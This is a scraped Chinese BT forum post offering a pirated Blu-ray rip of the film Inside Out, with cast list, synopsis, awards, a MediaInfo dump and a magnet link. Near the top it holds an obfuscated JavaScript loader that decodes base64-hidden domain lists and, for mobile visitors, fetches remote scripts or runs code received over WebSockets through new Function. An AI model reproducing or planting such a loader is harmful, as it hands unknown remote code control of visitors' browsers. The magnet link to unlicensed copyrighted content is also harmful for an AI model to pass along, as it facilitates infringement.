头脑特工队[国粤语音轨/中文字幕]Inside.Out.2015.1080p.BluRay.x264.DTS.3Audio-迅雷下载 8.16GB

版主小s 23天前 213

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 头脑特工队 / 大脑内外 / 大脑环游记 / 头脑大作战 / 头脑总动员 / 玩转脑朋友(港) / 由内而外 / 脑中小小人 / 脑筋急转弯(台)

◎片 名 Inside Out

◎年 代 2015

◎产 地 美国

◎类 别 喜剧 / 动画 / 冒险

◎语 言 英语

◎上映日期 2015-06-19(美国) / 2015-10-06(中国大陆)

◎IMDb评分 8.1/10 from 627086 users

◎IMDb链接 https://www.imdb.com/title/tt2096673

◎豆瓣评分 8.7/10 from 480842 users

◎豆瓣链接 https://movie.douban.com/subject/10533913/

◎片 长 95分钟

◎导 演 彼特·道格特 Pete Docter / 罗纳尔多·德尔·卡门 Ronaldo Del Carmen

◎编 剧 彼特·道格特 Pete Docter / 罗纳尔多·德尔·卡门 Ronaldo Del Carmen / 梅格·勒福夫 Meg LeFauve / 乔什·库雷 Josh Cooley / 迈克尔·阿恩特 Michael Arndt / 西蒙·里奇 Simon Rich / 鲍勃·彼德森 Bob Peterson / 比尔·哈德尔 Bill Hader / 艾米·波勒 Amy Poehler

◎主 演 艾米·波勒 Amy Poehler

菲利丝·史密斯 Phyllis Smith

理查德·坎德 Richard Kind

比尔·哈德尔 Bill Hader

刘易斯·布莱克 Lewis Black

敏迪·卡灵 Mindy Kaling

凯特林·迪亚斯 Kaitlyn Dias

戴安·琳恩 Diane Lane

凯尔·麦克拉克伦 Kyle MacLachlan

波拉·庞德斯通 Paula Poundstone

鲍比·莫尼汉 Bobby Moynihan

宝拉·佩尔 Paula Pell

大卫·戈尔兹 Dave Goelz

弗兰克·奥兹 Frank Oz

乔什·库雷 Josh Cooley

弗利 Flea

约翰·拉岑贝格 John Ratzenberger

卡洛斯·阿拉斯拉奇 Carlos Alazraqui

皮特·萨加尔 Peter Sagal

拉什达·琼斯 Rashida Jones

罗里·艾伦 Lori Alan

约翰·齐甘 John Cygan

雪莉·琳恩 Sherry Lynn

拉瑞恩·纽曼 Laraine Newman

帕丽斯·冯·戴克 Paris Van Dyke

特蕾莎·甘泽尔 Teresa Ganzel

鲍伯·伯根 Bob Bergen

杰夫·奎卡 Jeff Kryka

张震 Zhen Zhang

山新 Shuang Wang

佟心竹 Xinzhu Tong

◎标 签 动画 | 成长 | 美国 | 温情 | Pixar | 喜剧 | 心理 | Disney

◎简 介

可爱的小女孩莱莉(凯特林·迪亚斯 Kaitlyn Dias 配音)出生在明尼苏达州一个平凡的家庭中,从小她在父母的呵护下长大,脑海中保存着无数美好甜蜜的回忆。当然这些记忆还与几个莱莉未曾谋面的伙伴息息相关,他们就是人类的五种主要情绪:乐乐(艾米·波勒 Amy Poehl er 配音)、忧忧(菲利丝·史密斯 Phyllis Smith 配音)、怕怕(比尔·哈德尔 Bill Hader 配音)、厌厌(敏迪·卡灵 Mindy Kaling 配音)和怒怒(刘易斯·布莱克 Lewis Black 配音)。乐乐作为团队的领导,她协同其他伙伴致力于为小主人营造更多美好的珍贵回忆。某天,莱莉随同父母搬到了旧金山,肮脏逼仄的公寓、陌生的校园环境、逐渐失落的友情都让莱莉无所适从,她的负面情绪逐渐累积,内心美好的世界渐次崩塌。为了保护这一切,乐乐只有行动起来……

◎获奖情况

第88届奥斯卡金像奖(2016)

最佳原创剧本(提名) 梅格·勒福夫 / 彼特·道格特 / 罗纳尔多·德尔·卡门 / 乔什·库雷

最佳动画长片 乔纳斯·里维拉 / 彼特·道格特

第73届金球奖(2016)

电影类 最佳动画长片

第69届英国电影学院奖(2016)

电影奖 最佳原创剧本(提名) 梅格·勒福夫 / 彼特·道格特 / 乔什·库雷

电影奖 最佳动画片 彼特·道格特

第43届动画安妮奖(2016)

最佳动画长片

最佳导演 彼特·道格特

最佳编剧 梅格·勒福夫 / 彼特·道格特 / 乔什·库雷

最佳配音 菲利丝·史密斯

最佳配音(提名) 艾米·波勒

最佳配乐

最佳剪辑

最佳分镜

最佳艺术指导

最佳动画角色

最佳角色设计

最佳动画效果(提名)

第27届美国制片人工会奖(2016)

最佳动画片制片人奖

第66届美国剪辑工会奖(2016)

动画片最佳剪辑

第14届美国视觉效果协会奖(2016)

最佳动画电影视觉效果(提名)

最佳动画电影CG动画角色

最佳动画电影CG背景(提名)

最佳动画电影模拟动画效果(提名)

第81届纽约影评人协会奖(2015)

最佳动画片

第87届美国国家评论协会奖(2015)

最佳动画片

年度佳片

第21届美国评论家选择电影奖(2016)

最佳喜剧片(提名)

最佳动画片

最佳原创剧本(提名) 梅格·勒福夫 / 乔什·库雷

第16届美国电影学会奖(2015)

年度佳片

第20届金卫星奖(2016)

电影部门 最佳动画片

第19届好莱坞电影奖(2015)

年度动画 彼特·道格特

第14届华盛顿影评人协会奖(2015)

最佳原创剧本

最佳动画片

第36届波士顿影评人协会奖(2015)

最佳动画片

第28届芝加哥影评人协会奖(2015)

最佳动画片

第19届美国在线影评人协会奖(2015)

最佳影片(提名)

最佳原创剧本(提名) 梅格·勒福夫 / 彼特·道格特 / 罗纳尔多·德尔·卡门 / 乔什·库雷

最佳动画片

第17届美国青少年选择奖(2015)

Choice Movie: Hissy Fit(提名) 刘易斯·布莱克

最佳暑期电影(提名)

最佳暑期电影女演员(提名) 艾米·波勒

第2届豆瓣电影年度榜单(2015)

评分最高的动画片

10月最受关注电影(提名)

第6届豆瓣电影鑫像奖(2016)

鑫豆单元 最佳影片(外语)(提名)

鑫豆单元 最佳动画长片

  1. General

  2. Unique ID : 166444783309282430183386901013345004432 (0x7D381966E40C3288044249ADB2E6EB90)

  3. Complete name : Inside.Out.2015.1080p.BluRay.x264.DTS.3Audio-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.16 GiB

  7. Duration : 1 h 34 min

  8. Overall bit rate : 12.3 Mb/s

  9. Movie name : Inside Out - Blu-ray?

  10. Encoded date : UTC 2021-07-09 04:27:52

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 34 min

  25. Bit rate : 9 450 kb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.190

  36. Stream size : 6.26 GiB (77%)

  37. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=0.50:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.80 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.30 / pb_ratio=1.20 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. Format : DTS

  44. Format/Info : Digital Theater Systems

  45. Codec ID : A_DTS

  46. Duration : 1 h 34 min

  47. Bit rate mode : Constant

  48. Bit rate : 1 509 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : C L R Ls Rs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 16 bits

  54. Compression mode : Lossy

  55. Stream size : 1 024 MiB (12%)

  56. Title : English

  57. Language : English

  58. Default : Yes

  59. Forced : No


  60. Audio #2

  61. ID : 3

  62. Format : AC-3

  63. Format/Info : Audio Coding 3

  64. Commercial name : Dolby Digital

  65. Codec ID : A_AC3

  66. Duration : 1 h 34 min

  67. Bit rate mode : Constant

  68. Bit rate : 640 kb/s

  69. Channel(s) : 6 channels

  70. Channel layout : L R C LFE Ls Rs

  71. Sampling rate : 48.0 kHz

  72. Frame rate : 31.250 FPS (1536 SPF)

  73. Compression mode : Lossy

  74. Stream size : 434 MiB (5%)

  75. Title : Mandarin

  76. Language : Chinese

  77. Service kind : Complete Main

  78. Default : No

  79. Forced : No


  80. Audio #3

  81. ID : 4

  82. Format : AC-3

  83. Format/Info : Audio Coding 3

  84. Commercial name : Dolby Digital

  85. Codec ID : A_AC3

  86. Duration : 1 h 34 min

  87. Bit rate mode : Constant

  88. Bit rate : 640 kb/s

  89. Channel(s) : 6 channels

  90. Channel layout : L R C LFE Ls Rs

  91. Sampling rate : 48.0 kHz

  92. Frame rate : 31.250 FPS (1536 SPF)

  93. Compression mode : Lossy

  94. Stream size : 434 MiB (5%)

  95. Title : Cantonese

  96. Language : Chinese

  97. Service kind : Complete Main

  98. Default : No

  99. Forced : No


  100. Text #1

  101. ID : 5

  102. Format : PGS

  103. Muxing mode : zlib

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 33 min

  107. Bit rate : 30.9 kb/s

  108. Count of elements : 3500

  109. Stream size : 20.7 MiB (0%)

  110. Title : chs

  111. Language : Chinese

  112. Default : Yes

  113. Forced : No


  114. Text #2

  115. ID : 6

  116. Format : PGS

  117. Muxing mode : zlib

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 33 min

  121. Bit rate : 31.5 kb/s

  122. Count of elements : 3628

  123. Stream size : 21.1 MiB (0%)

  124. Title : cht

  125. Language : Chinese

  126. Default : No

  127. Forced : No


  128. Text #3

  129. ID : 7

  130. Format : PGS

  131. Muxing mode : zlib

  132. Codec ID : S_HDMV/PGS

  133. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  134. Duration : 1 h 33 min

  135. Bit rate : 27.8 kb/s

  136. Count of elements : 2478

  137. Stream size : 18.6 MiB (0%)

  138. Title : cht_hk

  139. Language : Chinese

  140. Default : No

  141. Forced : No


  142. Text #4

  143. ID : 8

  144. Format : PGS

  145. Muxing mode : zlib

  146. Codec ID : S_HDMV/PGS

  147. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  148. Duration : 1 h 33 min

  149. Bit rate : 28.4 kb/s

  150. Count of elements : 3218

  151. Stream size : 19.0 MiB (0%)

  152. Title : cht_tw

  153. Language : Chinese

  154. Default : No

  155. Forced : No


  156. Text #5

  157. ID : 9

  158. Format : PGS

  159. Muxing mode : zlib

  160. Codec ID : S_HDMV/PGS

  161. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  162. Duration : 1 h 33 min

  163. Bit rate : 44.5 kb/s

  164. Count of elements : 2734

  165. Stream size : 29.8 MiB (0%)

  166. Title : eng

  167. Language : English

  168. Default : No

  169. Forced : No


  170. Menu

  171. 00:00:00.000 : Chapter 01

  172. 00:07:22.692 : Chapter 02

  173. 00:11:36.779 : Chapter 03

  174. 00:15:46.403 : Chapter 04

  175. 00:20:02.242 : Chapter 05

  176. 00:25:21.436 : Chapter 06

  177. 00:26:47.063 : Chapter 07

  178. 00:30:10.183 : Chapter 08

  179. 00:34:45.791 : Chapter 09

  180. 00:36:02.285 : Chapter 10

  181. 00:37:45.304 : Chapter 11

  182. 00:41:27.359 : Chapter 12

  183. 00:43:35.612 : Chapter 13

  184. 00:45:19.508 : Chapter 14

  185. 00:46:51.850 : Chapter 15

  186. 00:50:02.457 : Chapter 16

  187. 00:51:34.341 : Chapter 17

  188. 00:56:12.160 : Chapter 18

  189. 01:00:03.683 : Chapter 19

  190. 01:01:17.840 : Chapter 20

  191. 01:03:50.367 : Chapter 21

  192. 01:06:27.191 : Chapter 22

  193. 01:11:15.771 : Chapter 23

  194. 01:13:40.540 : Chapter 24

  195. 01:15:38.658 : Chapter 25

  196. 01:20:00.336 : Chapter 26

  197. 01:23:57.198 : Chapter 27

  198. 01:26:18.339 : Chapter 28


TAGS 冒险 动画 喜剧

磁力链:
  • magnet:?xt=urn:btih:D531A6C5D41C00151400D6123E54174D8F81F568
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回